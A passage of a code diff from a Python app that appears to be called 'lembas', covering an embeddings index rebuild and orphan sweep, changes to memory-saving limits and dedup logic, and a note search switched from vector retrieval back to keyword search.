A backstop for the one case the listeners cannot cover: a delete that
happened with no event loop running -- a CLI command, a test, a cascade from
deleting a user -- where `schedule` had nowhere to put its task. Cheap
enough to run at startup and at the end of every rebuild: one NOT IN per
kind, against an indexed column.
"""
removed = 0
for kind, (model, _) in SOURCES.items():
result = db.execute(
delete(Chunk).where(
Chunk.resource_type == kind,
Chunk.resource_id.not_in(select(model.id)),
)
)
removed += int(result.rowcount or 0)
if removed:
db.commit()
log.info("dropped %d orphaned chunk(s)", removed)
return removed
# --- Rebuilding everything ------------------------------------------------------
@dataclass
class Progress:
"""What a rebuild has done so far.
In-process, because a rebuild does not survive a restart. Persisting it
would mean a progress bar that stops moving and never finishes, which is
worse than one that admits it is gone.
"""
running: bool = False
total: int = 0
done: int = 0
written: int = 0
error: str = ""
kinds: dict[str, int] = field(default_factory=dict)
@property
def percent(self) -> int:
return int(self.done * 100 / self.total) if self.total else 0
_PROGRESS = Progress()
_REBUILD: asyncio.Task | None = None
def progress() -> Progress:
return _PROGRESS
def counts(db: DBSession) -> dict[str, int]:
"""How many chunks exist per kind. What the page shows when nothing is running."""
rows = db.execute(
select(Chunk.resource_type, func.count()).group_by(Chunk.resource_type)
).all()
return {str(kind): int(count) for kind, count in rows}
async def rebuild_all(*, force: bool = True) -> None:
"""Walk every record and index it, committing as it goes.
One at a time and never gathered. The far side is usually one local model
server, and twenty concurrent embedding requests against it is slower than
twenty sequential ones as well as being ruder.
"""
global _PROGRESS
_PROGRESS = Progress(running=True)
try:
with session_scope() as db:
if embedder(db) is None:
_PROGRESS.error = "No embedding model is configured."
return
work: list[tuple[str, str]] = []
for kind, (model, _) in SOURCES.items():
ids = [row[0] for row in db.execute(select(model.id)).all()]
work.extend((kind, str(row_id)) for row_id in ids)
_PROGRESS.total = len(work)
for kind, resource_id in work:
written = await index_resource(kind, resource_id, force=force)
_PROGRESS.done += 1
_PROGRESS.written += written
_PROGRESS.kinds[kind] = _PROGRESS.kinds.get(kind, 0) + written
# After the walk, not before: a record deleted while this was running
# would otherwise be swept and then re-indexed from a row that no longer
# exists. `index_resource` handles that case too, and doing it in this
# order means one pass reconciles both directions.
with session_scope() as db:
sweep_orphans(db)
except asyncio.CancelledError:
_PROGRESS.error = "Stopped."
raise
except Exception as exc: # noqa: BLE001 - a rebuild failing must be reportable
log.exception("rebuilding the index failed")
_PROGRESS.error = str(exc)
finally:
_PROGRESS.running = False
def start_rebuild(*, force: bool = True) -> bool:
"""Start a rebuild if one is not already going. True if this call started it."""
global _REBUILD
if _REBUILD is not None and not _REBUILD.done():
return False
try:
asyncio.get_running_loop()
except RuntimeError:
return False
_REBUILD = asyncio.create_task(rebuild_all(force=force))
return True
async def shutdown() -> None:
"""Cancel the rebuild and any in-flight indexing.
Nothing here is lost that matters: a chunk set is either written whole or
not at all, and the next rebuild picks up whatever was missed.
"""
global _REBUILD
tasks = [task for task in (_REBUILD, *_TASKS.values()) if task is not None]
_TASKS.clear()
_REBUILD = None
for task in tasks:
task.cancel()
for task in tasks:
with contextlib.suppress(asyncio.CancelledError, Exception):
await task
def clear() -> None:
"""For tests: forget the in-process state without touching the database."""
global _REBUILD, _PROGRESS
_TASKS.clear()
_REBUILD = None
_PROGRESS = Progress()
__all__ = [
"CHUNK_KINDS",
"SOURCES",
"Embedder",
"Progress",
"clear",
"counts",
"embedder",
"enabled",
"forget_resource",
"index_resource",
"kind_of",
"progress",
"rebuild_all",
"schedule",
"schedule_for",
"shutdown",
"start_rebuild",
"text_of",
]
+4 -26
View File
@@ -57,45 +57,23 @@ def get(db: DBSession, memory_id: str, user: User | None) -> Memory | None:
def add(db: DBSession, *, owner: User, content: str, author: str = AUTHOR_MODEL) -> Memory:
"""Record a fact. Raises ValueError when there is no room or nothing to say.
An exact repeat returns the record that already exists rather than making a
second one. The prompt asks the model to check before adding -- it is shown
every memory, so it can -- but the same preference saved four times in
slightly different words is the commonest failure here, and it is worse than
wasted tokens: it makes `memory_forget` ambiguous for every one of them.
Wording handles the near-duplicates; this handles the exact ones, which is
the half a prompt cannot be relied on for.
"""
"""Record a fact. Raises ValueError when there is no room or nothing to say."""
content = " ".join((content or "").split())
if not content:
raise ValueError("A memory cannot be empty.")
content = content[:MAX_MEMORY_CHARS]
existing = db.scalars(
select(Memory).where(Memory.owner_id == owner.id, Memory.content == content)
).first()
if existing is not None:
return existing
count = db.scalar(
select(func.count()).select_from(Memory).where(Memory.owner_id == owner.id)
)
if (count or 0) >= MAX_RECORDS:
# Deliberately does NOT say "remove one first". Past MAX_TOTAL_CHARS the
# injected block is truncated, so the model is not shown every memory
# and would be choosing blind -- and deleting the wrong one is not
# something anybody finds out about.
raise ValueError(
f"There are already {MAX_RECORDS} memories, which is the limit, so "
f"nothing was saved. Do not remove one to make room — you are not "
f"shown all of them and would be guessing. Say that the limit has "
f"been reached, and put this in a note instead."
f"There are already {MAX_RECORDS} memories. Remove one first, or put "
f"this in a note instead."
)
memory = Memory(
owner_id=owner.id,
content=content,
content=content[:MAX_MEMORY_CHARS],
author=author if author in (AUTHOR_USER, AUTHOR_MODEL) else AUTHOR_MODEL,
)
db.add(memory)
+5 -18
View File
@@ -13,9 +13,9 @@ import logging
from sqlalchemy import select
from sqlalchemy.orm import Session as DBSession
from lembas.db.models import AUTHOR_MODEL, AUTHOR_USER, CHUNK_NOTE, Note, User
from lembas.db.models import AUTHOR_MODEL, AUTHOR_USER, Note, User
from lembas.services import sharing
from lembas.services.library import retrieval
from lembas.services.library.fts import search_ids
log = logging.getLogger(__name__)
@@ -43,22 +43,9 @@ def recent(db: DBSession, user: User | None, *, limit: int = 20) -> list[Note]:
)
def search(
db: DBSession,
user: User | None,
needle: str,
*,
limit: int = 10,
vector: list[float] | None = None,
) -> list[Note]:
"""Notes matching `needle` that this user may see, best match first.
`vector` is the query already embedded, or None. It comes from the caller
rather than being worked out here because this is synchronous and embedding
is an HTTP request -- see `services/library/retrieval.py`. None means the
keyword search exactly as it always was.
"""
hits = retrieval.search(db, INDEX, needle, kind=CHUNK_NOTE, vector=vector, limit=limit * 4)
def search(db: DBSession, user: User | None, needle: str, *, limit: int = 10) -> list[Note]:
"""Notes matching `needle` that this user may see, best match first."""
hits = search_ids(db, INDEX, needle, limit=limit * 4)
if not hits:
return []
order = {hit.id: position for position, hit in enumerate(hits)}

Some files were not shown because too many files have changed in this diff Show More